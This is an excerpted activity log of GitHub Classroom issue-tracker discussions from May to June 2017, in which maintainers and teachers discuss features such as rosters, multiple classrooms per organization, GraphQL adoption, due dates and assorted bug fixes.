Looks like slugs -> id has gone stale. I'm not sure moving `assignments#new` to a new URI is a good idea, the current URI is the correct RESTful URI.

Having an assignment name blacklist seems like a fair way to do this.

[2017-05-24 00:06] nwoodthorpe opened #871 "Individual & Group assignments should use the same type of validation."
Was just tackling a quick win and noticed this. Individual assignments are validated at the model level with nothing on the frontend.  Group assignments are validated on the front end and at the model level.

It's odd because users see errors for group assignments as not being able to click submit, but for individual assignments it shows an error dialog. We should make this more uniform. Either nu

[2017-05-24 05:13] paragmantri commented on #595
Thanks @nwooodtorpe. Once you do that, I hope assignment submissions will appear under each classroom. As of now, all the student submissions appear directly under the organisation and the classroom is not in the tree. It can get very confusing to differentiate between our own repo as well as the ones submitted by students.

[2017-05-24 14:05] johndbritton commented on #765
If we implement this feature, rather than hard coding by name, I would make a UI in Classroom to select team(s) that should have elevated privileges with the possibility of creating a new team through the app. That way you can track escalated permissions by team id rather than team name.

[2017-05-24 14:14] johndbritton commented on #871
I think we should add front-end validations across the board.

We should also make sure it's clear what is preventing them from submitting.

cc/ @tarebyte for background and general awareness

[2017-05-24 17:19] nwoodthorpe commented on #871
Got a PR out for making this more uniform #872.

I like the idea of some sort of identifier of what's causing the issue. :+1:

[2017-05-24 20:50] nwoodthorpe commented on #466
This has been stale for over a year. It seems this isn't an issue any more, if this comes up again feel free to re-open.

[2017-05-24 20:50] #466 closed

[2017-05-24 20:57] nwoodthorpe commented on #448
it seems this was half implemented, then forgotten about. There's lots of other stuff going on right now, but hopefully we'll be able to finish this up sometime soon.

[2017-05-24 21:07] nwoodthorpe commented on #721
I was totally wrong

From #443 (which I've closed in favor of this),

I think this is definitely something worth looking into. At the very least, figure out how much work would go into making this happen.

[2017-05-24 21:08] nwoodthorpe commented on #443
Closing in favor of #443, I've moved your comment to that thread.

[2017-05-24 21:08] #443 closed

[2017-05-24 21:11] nwoodthorpe commented on #441
I actually ran into this yesterday, created an org for Classroom and couldn't figure out why it wouldn't show. The tooltip isn't very prominent, I think a separate avatar may be a good idea.

[2017-05-24 21:13] nwoodthorpe commented on #438
Over a year of inactivity, closing.

[2017-05-24 21:13] #438 closed

[2017-05-24 21:16] nwoodthorpe commented on #415
The discussion about student identifiers has been moved to #448. Staff-assigned groups hasn't seen activity in well over a year, closing for inactivity.

[2017-05-24 21:16] #415 closed

[2017-05-24 21:20] nwoodthorpe commented on #394
Closing for inactivity.

[2017-05-24 21:20] #394 closed

[2017-05-24 21:32] nwoodthorpe commented on #364
I think this was somehow resolved. No activity in 15 months, closed!

[2017-05-24 21:33] nwoodthorpe commented on #255
Do we know if this is still an issue students/teachers come across often?

[2017-05-24 21:42] nwoodthorpe commented on #667
I'd love to see this happen, but it's fallen inactive. If we decide we want to implement this, we'll re-open.

[2017-05-24 21:42] #667 closed

[2017-05-25 00:56] BelieveC commented on #848
I would like to work on this!

[2017-05-25 01:02] nwoodthorpe commented on #848
It's all yours!

[2017-05-25 01:05] BelieveC commented on #848
Thanks :smile:

[2017-05-25 09:56] stephenlevitt commented on #448
Great

[2017-05-25 15:32] GhostMonk3408 opened #874 "Way to deal with students that do not own a GitHub account?"
There is likely (and I'm dealing with) instances where a student or an entire class of students will not have a GitHub account already, and in a short, fast-paced class (say a week-long summer camp course) there may not be time to create an account for each student before it is needed. There should probably be a way to deal with this without hosting GitHub enterprise locally to avoid violating ToS

[2017-05-25 15:47] nwoodthorpe commented on #874
If you give your first assignment link to the students, they'll be prompted to create an account if they don't have one which takes about 5 minutes. This way, you don't need to do any extra work, the students can manage creating an account. Would this work for your use-case?

[2017-05-25 16:25] liam-a-wms commented on #874
Due to limited internet speeds at the summer camp (last time I measured, it was between 2 and 20 Mb/s) it might sink more time than preferable. Though I guess I should be able to reasonably expect my students to be able to multitask account creation and discussion/work.

Liam Williams
Communications Chairman
C: (410) 245-4781
BOY SCOUTS OF AMERICA
Nentico Lodge 12

Sent from my iPhone

[2017-05-25 16:31] nwoodthorpe commented on #874
I looked into it, GitHub actually doesn't expose an API endpoint for creating accounts. That means Classroom isn't able to deal with this task, the only way is for your students to do it themselves unfortunately.

Perhaps asking them to have a GitHub account prepared before coming to the camp would work well for your situation?

[2017-05-25 16:55] liam-a-wms commented on #874
The way I was thinking being able to do it was to simply create a bunch of @bakna.net accounts (I own the domain) and hand them the credentials at the start of class, and clean up the accounts afterwards; locking and/or removing them.

Liam Williams
Communications Chairman
C: (410) 245-4781
BOY SCOUTS OF AMERICA
Nentico Lodge 12

Sent from my iPhone

[2017-05-25 17:18] nwoodthorpe commented on #874
Unfortunately they'll have to do it during your class then. GitHub doesn't offer a way to automate account creation, and trying to create all the accounts yourself may get you banned for "owning too many accounts". Im sorry we aren't able to offer you a better solution :/

[2017-05-26 13:46] johndbritton commented on #255
I think it would still be useful for us to implement an interstitial page explaining what permissions we need and why, before we land users on the GitHub authorization page. The main reason we need this is that that page is not really customizable and the entire app requires GitHub login so this happens really early for users.

[2017-05-26 15:45] jfiksel commented on #595
I would also like to recommend this feature. It seems like one could easily get bogged down with added a new organization for each semester. In addition, it would be nice to have generic starting code for different assignments within an organization, and then when creating new classrooms for each semester, the starter code could then be re-used very easily.

[2017-05-26 16:36] nwoodthorpe commented on #255
We could probably roll this into the new signup flow we've been chatting about. I'll make a note :+1:

[2017-05-27 21:12] #845 closed

[2017-05-27 21:26] tarebyte commented on #849
@Buskcoin while that does help a certain use case I'm not 100% sure that's right for GitHub Classroom. Here's why.

First, we don't know who the students are yet. So we'd have to take a list of names (and GitHub accounts) for the students and let you set up the assignments. If there is data that is incorrect it would be really cumbersome to change.

We also can't add a student to an organization a

[2017-05-27 21:30] tarebyte commented on #831
Sure does!

[2017-05-27 21:30] #831 closed

[2017-05-27 21:41] tarebyte opened #875 "GraphQL support"
There are a lot of places (particularly when loading resources) where we can use the new [GitHub v4 API](https://developer.github.com/v4/) to make this less resource intensive.

## Example
One of the big use cases I'm thinking of is when we load assignment and group assignment repositories on the assignment pages.

Instead of loading every repo and every owner with their own HTTP request we could

[2017-05-27 21:47] tarebyte commented on #781
I think having private as default is fine, however...

I'd really like it if the page to be smarter, it would be cool if we could tell a teacher before they create their first assignment whether they can even make a private repository.

[2017-05-29 01:07] BelieveC commented on #848
@tarebyte @nwoodthorpe
Is this the workflow you want to implement ->

`stafftools/user/x` -> `x has Access token: rejected` -> `Destroy user/x`

Or Do you suggest something else by

[2017-05-29 01:39] tarebyte commented on #848
I want to remove them from the Classroom not delete thi account.

Or it would be cool if we could mark them as disabled.

[2017-05-30 00:41] ProfLeune opened #876 "Individual assigment (missing n)"
![image](https://cloud.githubusercontent.com/assets/25888230/26564469/1d425096-44af-11e7-9184-8b9d53c8e9d0.png)

[2017-05-30 03:20] kytrinyx commented on #682
@nwoodthorpe I'm still interested in this, but have no idea where to start. I suspect that this needs to be tackled from a UX perspective and I have no experience with UX. Also, since I'm not a teacher, I don't have a use-case that could drive a prototype.

[2017-05-30 16:18] nwoodthorpe opened #877 "Allow "Account Creation" by teachers using student identifiers"
Just moving some stuff from elsewhere here so we can discuss and so it doesn't get buried.

@johndbritton had the idea of solving the "I want to setup accounts for my students" problem that a bunch of teachers are having by allowing the teacher to upload a list of student identifiers (perhaps student ID?) when they create the classroom. Then, when a student goes to accept an assignment (or possibl

[2017-05-30 16:28] nwoodthorpe commented on #876
Good catch, thanks for the report!

[2017-05-30 16:33] #876 closed

[2017-05-30 16:39] nwoodthorpe commented on #682
It'd be a good idea to have a meeting with a few people from the education team to see what we think of this. I could see it being something we decide not to do, or maybe it's a small project on Classroom, or honestly it could turn into an entire application on its own.

[2017-05-30 17:47] nwoodthorpe opened #879 "Having too many Personal Access Token permissions breaks Classroom"
`ApplicationController#authenticate_user!` checks that the user has adequate scopes on the access_token. One of the things we look for is the scope `user:email`. But if a user grants `user:read`, `user:email`, and `user:follow`, the GitHub API condenses that into the scope `user`. Since our check just tries to find `user:email` in the list of scopes, a token with the scope `user` is denied for hav

[2017-05-30 18:16] ProfLeune opened #880 "Clone classroom"
I would love to have the ability to set up a classroom and have it function as a master template. Each time a class would run, I can simply clone the master template and disseminate the updated assignment links to the students in that section.

Until then, I am concerned about the overhead of having to rebuild the classroom each time, and recreating each of the 25-or-so assignments.

[2017-05-30 18:27] johndbritton commented on #880
@ProfLeune Thanks for your feedback, this is good information. We'll definitely consider this as a possible incremental improvement.

[2017-05-30 18:55] kytrinyx commented on #682
Before scheduling a meeting, I'd prefer to have @mozzadrella, @sanicki, and/or @johndbritton weigh in.

- Is there value?
- Is now the right time?

If the answer to both of these are "yes", I'm sure there are some useful next steps that don't involve scheduling a meeting (yet).

[2017-05-30 20:06] johndbritton commented on #682
Yes, I agree this would be an excellent feature to have.

Agreed here. Before we can get to a directory I think we should prioritize due dates, explicit submissions, and repository initialization.

Repository initialization is especially important for the directory, as that will be part of the template assignment format.

[2017-05-30 22:11] mozzadrella commented on #682
+1 to @johndbritton said, as integrating automated testing will also be part of the repository initialization

In the meantime I collect and tag the assignments I come across (language, course, type of school) for later use--and we may reach out to librarians or other instructional designers in the future to help collect them.

[2017-06-01 16:56] johndbritton commented on #531
I think this is still a valid issue. @nwoodthorpe, maybe something you can resolve this summer.

[2017-06-01 18:50] #432 closed

[2017-06-01 20:00] johndbritton commented on #875
How would this work with caching? Would we be able to cache a whole page request and only run it again if something has changed? Is this guaranteed to be an improvement given the caching we're doing currently?

[2017-06-02 14:29] webdif opened #891 "Create assignment with starter code from private repo of another organization?"
GitHub classroom does not allow multiple classroom per organization (yet #595), so at our school we have created an organization per class.

To make things easier, we create a separate organization that contains all starter code repos for student assignments.

But right now, it's impossible to create an assignment with adding a starter code from a private repo from another organization, even if I'

[2017-06-02 15:50] nwoodthorpe commented on #613
There's a PR out for this, let's not close it.

[2017-06-02 15:51] nwoodthorpe commented on #813
There's a PR out for this, let's not close it.

[2017-06-03 03:06] BelieveC commented on #848
Users with rejected auth token will not be able to sign in. If so then I'm confused with the motto to disable the user from a classroom. Maybe I'm wrong somewhere. Looking forward to suggestion

[2017-06-04 22:54] gregnordstrom commented on #595
I'm another teacher in support of multiple classrooms per organization. It seems to map very well to the way I and others logically group our teaching material. Kudos to @tabinks who captured it quite well. Also, @webdif mentioned the desire to create assignments with starter code from another organization's private repo (e.g. a "master collection" of material for a given course that I maintain fr

[2017-06-05 15:35] nwoodthorpe commented on #848
So Organizations have `users` which represent the owners of the org. This is decoupled from GitHub, we only shows owners that have been invited to the classroom as an owner.

I think all we want to do is remove them from `organization.users`, but them having an invalid token is making this fail for some reason.

If you want to look into disabling them, that would probably mean temporarily removing

[2017-06-05 18:37] Leslie-C opened #899 "Unable to create new assignment"
I cannot create any new assignments from the web interface. As soon as I type in any of the text fields, the "Create assignment" button becomes greyed out and unclickable.

I can refresh the page and press "Create assignment" before entering anything, but, of course, that returns an error since I haven't completed any of the required fields. Am I missing something? Thanks!

<img width="606" alt="i

[2017-06-05 18:38] tarebyte commented on #899
@Leslie-C nope that's totally a bug on our end, I'll take a look and see what's going on.

Sorry for the trouble!

[2017-06-05 18:39] Leslie-C commented on #899
Thanks for checking it out. Let me know if you need additional info.

[2017-06-05 19:55] robwhess commented on #899
I don't know if this is related, but I and some of my students are currently experiencing a similar problem trying to create a team for a group assignment.  Whenever text is entered in the box to name the team, the "Create team" button is disabled:

<img width="646" alt="screenshot 2017-06-05 12 54 05" src="https://cloud.githubusercontent.com/assets/2029994/26800443/2afd3464-49ee-11e7-885a-a245cc3

[2017-06-05 20:38] tarebyte commented on #899
@Leslie-C @robwhess apologies for the issue, I've deployed a fix https://github.com/education/classroom/pull/900 to solve your issue until I can come up with a more proper way to solve it 😄

[2017-06-05 23:26] robwhess commented on #899
Thanks @tarebyte!  The fix looks like it's working.  My students are able to sign up for teams again.

[2017-06-05 23:57] Leslie-C commented on #899
@tarebyte, works for me too. Thanks again!

[2017-06-06 00:30] #507 closed

[2017-06-06 00:30] #871 closed

[2017-06-06 15:25] mozzadrella commented on #849
Tweaking the title of the issue to include in product planning.

[2017-06-06 23:54] nwoodthorpe opened #904 "Fix Classroom maintenance page"
Fairly sure it's because we can't iframe `education`.

[2017-06-07 02:21] #904 closed

[2017-06-07 15:03] #899 closed

[2017-06-07 22:27] nwoodthorpe commented on #779
Closing in favor of #772

[2017-06-07 22:27] #779 closed

[2017-06-07 22:39] nwoodthorpe commented on #781
Maybe the page would default to private if they have private repositories, or default to public with private grayed out if they don't have private repos?

[2017-06-07 22:42] nwoodthorpe commented on #662
Shoo probot

[2017-06-08 01:08] tarebyte commented on #781
@nwoodthorpe I think that'd be a fine solution, we have access to the org's billing information since we have the right credentials from their OAuth token.

[2017-06-08 23:14] #504 closed

[2017-06-08 23:14] #563 closed

[2017-06-08 23:14] #616 closed

[2017-06-09 13:16] BelieveC commented on #848
@nwoodthorpe

I tried removing owner with rejected auth token and it works fine with my instance.

Is it something else you were conveying ?

That's what I'm pointing out. Unless the user is re-authenticated he won't be able to log in. So what is the point of disabling the user? Again when he would be re-authenticated user would be enabled or something else?

[2017-06-09 17:50] nwoodthorpe commented on #848
Hm ok, I actually haven't tried replicating this, and your question about disabling is a good one as well.

@tarebyte do you have replication steps?

[2017-06-12 06:25] krishnapaladugu opened #909 "I am getting the below issue when i am running inspec remotely ."
D:/opscode/inspec/embedded/lib/ruby/gems/2.3.0/gems/httpclient-2.7.2/lib/httpclient/session.rb:597:in `initialize': A connection attempt failed because the connected party did not properly respond after a period of time, or established connection failed because connected host has failed to respond. - connect(2) for "52.172.222.116" port 5985 (52.172.222.116:5985) (Errno::ETIMEDOUT)
        from D:

[2017-06-12 17:47] tarebyte commented on #909
@krishnapaladugu so I have a few ideas from just looking at this stack trace, but could you expand on what kind of setup you're got going on here?

It also looks like you may be running an out of date version, I see you're using ruby `2.3.0` but we now run `2.4.1`

[2017-06-13 08:18] obcode commented on #613
I would like to have the following features:

1. The posibility to add a mapping from GitHub-Username to Realname, Studentnumber, etc.
    This could be based on some config I provide as Yaml or JSON.

2. A table with a row for each student, providing Information about all repos he or she is involved along with the CI status of each repo.

I have already planned to code a Dashboard for my needs ba

[2017-06-13 08:28] obcode commented on #546
I would like to see (1) and (2) implemented with higher priority in (1).

[2017-06-13 16:06] nwoodthorpe commented on #613
@obcode Hey! We've done a lot of discussion about 1) in #448, it's something we're planning on working on. I think this is something we can accomplish in the app itself without having a desktop client, what do you think?

This specific issue is going to be a little complicated, we actually have an implementation half in place, so that'll need to be tidied and updated, and then finished. It's 100%

[2017-06-13 16:34] nwoodthorpe opened #913 "Allow teachers to configure black-box testing through CI for students submissions"
It would be cool if teachers could configure some sort of black-box testing through a CI provider for submissions.

E.g. Students are making a simple web-app, and when submitted, this CI system compiles it and sends a few sample requests and compares responses with expectations.

This could also be expanded to anything else that a CI system can do, which is basically anything.

We don't have suppo

[2017-06-13 16:38] obcode commented on #613
@nwoodthorpe

#448 is work in the right direction, but I do not like uploading files using a web browser. At the moment the students create a `stud.yaml` file containing something like

    - github: obcode
      realname: Oliver Braun
      email: ...

But only in **private** repositories.

Matching to students id is done by a tiny script after cloning the repos.
For me it would be good enough to

[2017-06-13 17:18] wilfriedE opened #914 "Specify server port in Readme and script/ngrok"
The Readme has [the running port](https://github.com/education/classroom#development-environment-variables) to be 5000 however when running the application it points to 5200 instead. Similarly script/ngrok still uses port 5000.

Also on first run it was pointing to 5300 and then to 5200 on second run. @tarebyte should a specific port be enforced for foreman ?

[2017-06-13 17:29] tarebyte commented on #914
Yeah we should enforce those so it's consistent

[2017-06-13 18:17] nwoodthorpe commented on #613
Thanks for the feedback!

I'm a little worried about having the identifiers in the repository because not all classrooms use private repositories, and we want a solution that will work for as many use-cases as possible.

We're also throwing around some ideas in #877. It's something we're thinking about, and it's a priority for the summer.

Your idea for the is neat, I could see that being really u

[2017-06-13 18:57] obcode commented on #877
Great! Two ideas that would be useful, at least for me:

1. Downloadable (JSON or YAML) file containing the mappings from student identifiers to GitHub accounts.

2. The possibility to give each student, which accepts the assignment, automatically write access to a (maybe private) repository containing a wiki and stuff like this, we can use together during the course. (I am doing this by hand at t

[2017-06-13 19:06] obcode opened #918 "Dashboard: Overview over all assignments grouped by student"
In most of my classes, students have to finish different assignments, sometimes all of them must be finished and sometimes 5 out of 6 or something like that.

It would be useful for graduation to have a view in the dashboard, showing the repositories grouped by students along the information whether CI was successful or not.

GitHub Username | Assignment 1 | Assignment 2 | Assignment 3 | ...
-----

[2017-06-13 20:27] #914 closed

[2017-06-13 20:34] wilfriedE opened #919 "Install elasticsearch during setup"
Elasticsearch is not installed during setup

`13:25:26 elasticsearch.1 | unknown command: elasticsearch`

[2017-06-13 20:35] tarebyte commented on #919
This is kind of surprising, we have elasticsearch as part of the [`Brewfile`](https://github.com/education/classroom/blob/master/Brewfile#L14)

[2017-06-13 20:46] wilfriedE commented on #919
Looks like it gets installed however the `elasticsearch` command is not available

[code]

[2017-06-14 01:19] tarebyte opened #921 "Update Primer to the latest version"
It'd be ⚡️ if we could use [Primer `v6.0.0`](https://github.com/primer/primer-css/tree/v6.0.0) instead of our current [Primer `2.7.1`](https://github.com/primer/primer-css/tree/v2.7.1)

[2017-06-14 02:52] johndbritton commented on #913
@nwoodthorpe Is the idea here that the tests wouldn't be visible to the students? Technically I think this can be done already with some off-the-shelf CI tools but it'd take some work on the teachers' part.

[2017-06-14 16:12] nwoodthorpe commented on #913
@johndbritton By black-box, I meant more in terms of specs that hit the running application (integration vs unit specs) since those are usually independent of implementation.

This can 100% be done right now, but the teacher has to set up each assignment repo 1 by 1 with the CI system. A professor with 100 students and 10 classrooms would have to configure CI 1000 times.

[2017-06-15 08:48] brks commented on #595
@nwoodthorpe Hi, we're about to start our projects for 2017/18 and would like to use GitHub Classroom although having Multiple Classrooms Per Organisation is going to be required for us to use it. Any idea when you'll have time to work on this?

[2017-06-15 14:59] nwoodthorpe commented on #595
@tarebyte would this be do-able by namespacing assignment repos with the classroom name and namespacing team names with the classroom name?

[2017-06-15 15:33] nwoodthorpe opened #922 "Peek is throwing exceptions in the JS console"
It doesn't look like it's breaking anything, but it would be nice to find out why this is happening and tidy this up.

[code]

[2017-06-15 15:35] nwoodthorpe commented on #918
I'm not sure exactly what form this would take on, but I like the idea of more classroom summary views. I'm working on some other features right now, but if you want, @obcode you can try tackling this. Contributions are always welcome :)

[2017-06-15 16:16] tarebyte commented on #595
@nwoodthorpe let me think it over, but that's sounds about right.

[2017-06-15 19:40] nwoodthorpe opened #923 "URL to student discount isn't a link"
This URL should be a clickable <a> tag.

Saw on `assignment/new`
<img width="999" alt="screen shot 2017-06-15 at 12 39 37 pm" src="https://user-images.githubusercontent.com/4149056/27198618-c7d6ad98-51c7-11e7-9da6-8db0be48ccde.png">

[2017-06-16 19:37] nwoodthorpe commented on #546
Duplicate of #846

Closing all of these repo initialization issues so we can keep everything in one issue. This is something we're working on, but having 10 different issues for similar problems is making things a bit disorganized.

[2017-06-16 19:37] #546 closed

[2017-06-17 11:09] BrianEmilius commented on #595
I'm a teacher and I wholeheartedly support this feature.
It would reduce a lot of noise to be able to create multiple classrooms within an organization, it's intuitive, and it just makes plain and simple sense.

[2017-06-19 16:23] nwoodthorpe commented on #875
So the hurdle in implementing this is that all of our API requests are spread across a bunch of different models and partials. With the current setup, it's impossible to pool them all into one GraphQL query.

Looking at this view:
<img width="1077" alt="screen shot 2017-06-19 at 8 28 48 am" src="https://user-images.githubusercontent.com/4149056/27292806-59cf519c-54c9-11e7-8ff5-51876fa37d6c.png">

[2017-06-19 16:49] nwoodthorpe commented on #875
The current model of having GitHubResources where we ask for a resource and it returns us the data won't work with GraphQL at all.

Instead of a model where we models are queried from view partials, we could instead have some sort of `GitHubGraphQLPreparer` object that we instantiate either from the controller or in a view model. We tell it what fields we need, then tell it to fetch, and it genera

[2017-06-19 18:43] nwoodthorpe commented on #875
Some Profiling:

`/classrooms`:
Number of classrooms: 2
**API requests made: 3**
[code]

---

`/classrooms/:classroom_slug:`
Number of assignments: 5
**API requests made: 2**
[code]

---

`/classrooms/:classroom_slug:/assignments/:assignment_slug:/`
Number of repos: 5
**API requests made: 42**
[code]

---

`/classrooms/:classroom_slug:/group_assignments/:group_assignment_slug:/`
Number of team: 2

[2017-06-19 18:54] nwoodthorpe commented on #875
Observations from the profiling above:

- Lots of endpoint duplication. These weren't cached the requests all had different options, asking for different pieces of data.
- The API requests in `/classrooms` grow linearly with the number of classrooms. Not a huge issue.
- The API requests in `/classrooms/:classroom:/` are actually constant, which is awesome.
- Viewing assignments or group assignment

[2017-06-20 17:34] BelieveC commented on #848
@tarebyte @nwoodthorpe what should we do with this?

[2017-06-20 18:11] nwoodthorpe opened #931 "Overview: Staffship GraphQL to AssignmentsController"
This issue is for overview ideas and plans for shipping GraphQL for the AssignmentsController.

Once we've completed this, we can decide if we want to move forward and implement this app-wide.

GraphQL discussion here: #875

Project here: https://github.com/education/classroom/projects/6

Unfortunately since we can't query GraphQL by database ID, we're going to need to start by collecting global_r

[2017-06-20 18:13] nwoodthorpe opened #932 "Add global_relay_id field to AssignmentRepo"
Step 1 of #931

Since we'll need to start storing `global_relay_id` fields as well as normal database id's, we need to add this column.

[2017-06-20 18:17] nwoodthorpe opened #933 "Start fetching global_relay_id's for all new AssignmentRepos"
Step 2 of #931

Before we backfill all the old AssignmentRepos, we need to start fetching global_relay_id's for new assignment repos.

This step will actually bring GraphQL queries to Classroom, as we can't get these id's without it.

The Repository query [here](https://developer.github.com/v4/reference/query/) can fetch the global relay id via a owner and a name, and we have both when we create t

[2017-06-20 18:20] nwoodthorpe opened #934 "Backfill global_relay_id's for all existing AssignmentRepos"
Step 3 of #931

After this step, all AssignmentRepos will have global_relay_id's stored in the database, and we can move forward with GraphQL.

We can fetch global_relay_ids using the same way #933 will fetch them.

[2017-06-20 18:22] nwoodthorpe opened #935 "Start using GraphQL in staffshipped version of AssignmentsController"
Step 4 of #931

This step actually moves the `GraphQLAssignmentsController` to using GraphQL.

A good example of how to read from Fragments defined in the views here: https://github.com/github/graphql-client

[2017-06-20 21:40] wilfriedE opened #937 "Repository setup planning (WIP)"
For repository setup, I am going in the direction of having config files under .github/classroom/

I am considering we have three types of repositories: **Course Repository**, **Classroom Repository**,  **Assignment Repository**

### Course Repository Config (.github/classroom/config.yml)
The Course repository will have configs for course wide setup.
e.i  [#595](https://github.com/education/classr

[2017-06-20 22:01] nwoodthorpe commented on #933
The query:

[code]

Returns:

[code]

We'll run this query after creating the `AssignmentRepo` and then save the id to the object. :+1:

[2017-06-20 22:09] #932 closed

[2017-06-20 23:16] #923 closed

[2017-06-21 15:18] jfiksel commented on #849
Since classrooms are linked to organizations, would it be possible to automatically accept assignments for everyone who is a member of the organization (under the assumption that members = students)?

The ideal situation would be a unification of the idea of organizations and classroom. It seems odd to me that you have to go to classroom.github.com to create assignments, which isn't integrated wit

[2017-06-21 16:48] nwoodthorpe commented on #937
Im really liking the direction this is going, but I think we might be biting off a bit too much at once here. The stuff you've described in this issue solves initialization, assignment reuse, pre-setup teams and pre-setup assignments. I would definitely break this down to solve one problem at a time.

Pre-setup teams will also be tricky to implement without the concept of a "User" in our app, at l

[2017-06-21 17:16] nwoodthorpe commented on #849
Hey @jfiksel, thanks for the feedback!

Blindly giving the assignment to every member of the org wouldn't always work because some classes have TAs or other observers who aren't actually working on assignments.

There are some technical challenges to accepting assignments on behalf of all students of a classroom unfortunately. Currently in Classroom, we actually don't have a concept of "students i

[2017-06-21 18:02] jfiksel commented on #849
Any step that allows for automatic assignment acceptance would be nice, this seems like a convenient way to do it, as long as acquiring student ids is not difficult for teachers.

I still think the problem remains (although somewhat separate from this issue) that the classroom interface is separate from the organization interface--it would be great if the create new assignment link and the add stu

[2017-06-21 18:16] wilfriedE commented on #937
@nwoodthorpe I agree, I am thinking of breaking them down and tackling the requirements for initialization first then move on to the next items.

I am also thinking that we introduce the concept of a Course in github/Classroom. This will introduce a few other things but I want to know what everyone else thinks about this.

A way in which I think this will be good is that the instructor have the ab

[2017-06-21 21:05] nwoodthorpe commented on #849
Unfortunately that's not possible at the moment. GitHub.com and Classroom are separate codebases and separate apps, so we won't be able to make any changes to the Organization UI.

[2017-06-21 22:01] mozzadrella commented on #937
@wilfriedE -see where you're coming from on the "Course Repositories" as an organizing principle.

* Will all teachers who use GitHub Classroom teach "courses"? Even bootcamps?
* Is "course" too cognitively related to "Classroom"?
* Would configuring belong to assignment creation flow?

Let's discuss tomorrow ✨

[2017-06-22 05:44] #781 closed

[2017-06-22 09:23] obcode commented on #918
@nwoodthorpe unfortunately I have not enough time to do this work, since I never worked with Ruby on Rails so far :weary:

[2017-06-22 15:51] nwoodthorpe commented on #918
No worries!! We'll get to this when we can and ping you when it's implemented :)

[2017-06-22 18:55] nwoodthorpe opened #946 "Create assignment/editor testing suite"
We have no testing suite for the `assignment/editor` class right now, and we're starting to have small bugs pop up in the editor because of it.

[2017-06-22 23:23] tarebyte commented on #921
This is done! https://github.com/education/classroom/issues/925

[2017-06-22 23:23] #921 closed

[2017-06-23 00:35] nwoodthorpe commented on #919
@mozzadrella Sorry this is a little confusing, this is actually a developer setup problem, not a teacher setup one!

[2017-06-23 00:43] mcoblenz commented on #781
Thanks, everyone!

[2017-06-23 01:56] wilfriedE commented on #937
After today's discussions I've decided on the following as a starting point.

### Milestone 1: Assignment Initialization

1. Initialize assignment issues from private branch
2. Initialize assignment labels from private branch
3. Assign labels to assignments on initialization

**Initialize assignment issues from private branch**
    For this, we'll be expecting a `github-classroom` branch in the st

[2017-06-23 02:45] wilfriedE commented on #937
@mozzadrella yep, that'll be implemented as part of **Initialize assignment issues from private branch**

[2017-06-23 16:43] obcode commented on #891
same here

[2017-06-23 18:07] tarebyte commented on #891
@webdif you can in fact use private repos as starter code! We (GitHub Classroom) just need the proper permissions to see it.

So there's your issue 😄 you need to grant the app access to that organization. You grant us access by going to this link https://github.com/settings/connections/applications/64a051cf1598b9f0658f and verifying it on the page.

We have this link on https://classroom.github.co

[2017-06-23 18:13] jfiksel commented on #891
Thanks @tarebyte ! So just to confirm, let's say we have an organization called class-master with the private starter repos and an organization class-fall-2017. By granting GitHub Classroom access to both of these organizations, we can make assignments for the class-fall-2017 organization using the private repos from class-master as the starter code?

[2017-06-23 18:20] tarebyte commented on #891
@jfiksel sure can!

[2017-06-23 19:53] mozzadrella opened #958 "Proposal for Classroom nomenclature"
### Current nomenclature:

* Classroom is the product, and a Classroom is a collection of Assignments
* Assignments are repository of starter code, any other materials inside the repository
* Teachers distribute the Assignment via an invitation link
* Students accept Assignments via an invitation link
* Groups of students can be re-used in "groupings"

### Problems we’re solving for:

* "Assignmen

[2017-06-23 22:10] mozzadrella commented on #958
Feedback from a narrative UX expert:

[2017-06-23 22:34] mozzadrella opened #959 "Due dates for GitHub Classroom"
## Overview
6 respondents
3 teachers who are Classroom users
1 teacher who does not use Classroom
2 testers from usertesting.com

tl;dr
* surface the SHA + state at the deadline (and make clear that’s what it is, that it’s the SHA at deadline, not submission)
* also surface the latest SHA, even after the deadline, most instructors want to see that
* the most important number is if there are zero c

[2017-06-23 22:47] mozzadrella opened #960 "Sign up to test new GitHub Classroom features"
Would you like to work with the @education/classroom team to test new features?

Give a ✅ or a 📣 , and we'll reach out when features are ready to test.

Sound 🆗 ?

[2017-06-24 05:11] obcode commented on #960
✅

[2017-06-24 16:06] webdif commented on #891
@tarebyte It works :tada:
I think we can close this issue, I have another problem, but not related.

In the repository, there is a branch `master` with the starter code, and a branch `solution` with the expected code. Is there a way to use this repo as starter code, but just clone the `master` branch when a student accepts the invitation?

[2017-06-24 16:10] tarebyte commented on #891
@webdif right now the [Source Imports API](https://developer.github.com/v3/migration/source_imports/) (which we use to make the repos for the students) doesn't support branch selection. You get all or nothing.

I've been wanting that as well, and I've talked to the team in charge of that API to see if we can make something like that happen. Will let you know when I hear back!

In the mean time I t

[2017-06-24 16:10] #891 closed

[2017-06-26 12:43] brks commented on #595
@tarebyte @nwoodthorpe any developments with this feature?

[2017-06-26 12:55] brks commented on #960
📣

[2017-06-26 16:59] mozzadrella commented on #595
@brks 👋  saw you signed up to user-test new features :) Excellent, thank you.
This feature is not part of our current theme (https://github.com/education/classroom/projects/7)
But it may be included in our next theme (~July-August)

[2017-06-26 17:24] mozzadrella commented on #959
Follow up from Respondent C:

[2017-06-26 22:29] nwoodthorpe commented on #959
Thanks so much for doing this survey :)

So looks like the biggest concerns/feature requests are:

1) Make it more clear that viewing a submission is viewing a commit SHA
2) Have a clear, obvious way to view the student's latest work, not only their submitted work.
3) Show the number of commits, perhaps highlight repos with 0 commits
4) Summary of repository activity
5) Sort repos by (submitted, n

[2017-06-27 16:25] mozzadrella commented on #959
@nwoodthorpe think these are within grasp.

[2017-06-27 21:23] mozzadrella commented on #958
* need to revise groups/groupings

[2017-06-27 22:17] nwoodthorpe commented on #448
We're beginning work on this again!

I'll post some designs in a bit.

We've decided to build out the idea of "rosters", which is just a list of mappings between GitHub users and some sort of identifier. One key question is whether or not a roster should belong to a Classroom or a User.

@johndbritton After our chat, I had an idea about whether or not rosters should belong to Classrooms or Users.

[2017-06-27 23:41] nwoodthorpe commented on #448
Flow:

During the process of creating a classroom, the teacher will be prompted to create a roster. Creating a roster is done by providing a newline-seperated list of identifiers, + a name for the identifier type. Providing the list can be done by pasting into a box, or uploading a csv/txt file.

Once a roster is uploaded, there will be an option to manage the roster from the classroom settings. T

[2017-06-28 17:09] wilfriedE opened #970 "Initialize assignment issues from private branch"
Generate issues for Assignment repo if starter code has a `github-classroom` branch with issues.

As part of Milestone 1 in #937.

[2017-06-28 17:14] wilfriedE opened #971 "Initialize assignment labels from private branch"
Generate labels for Assignment repo if starter code has a `github-classroom` branch with labels.

As part of Milestone 1 in #937.

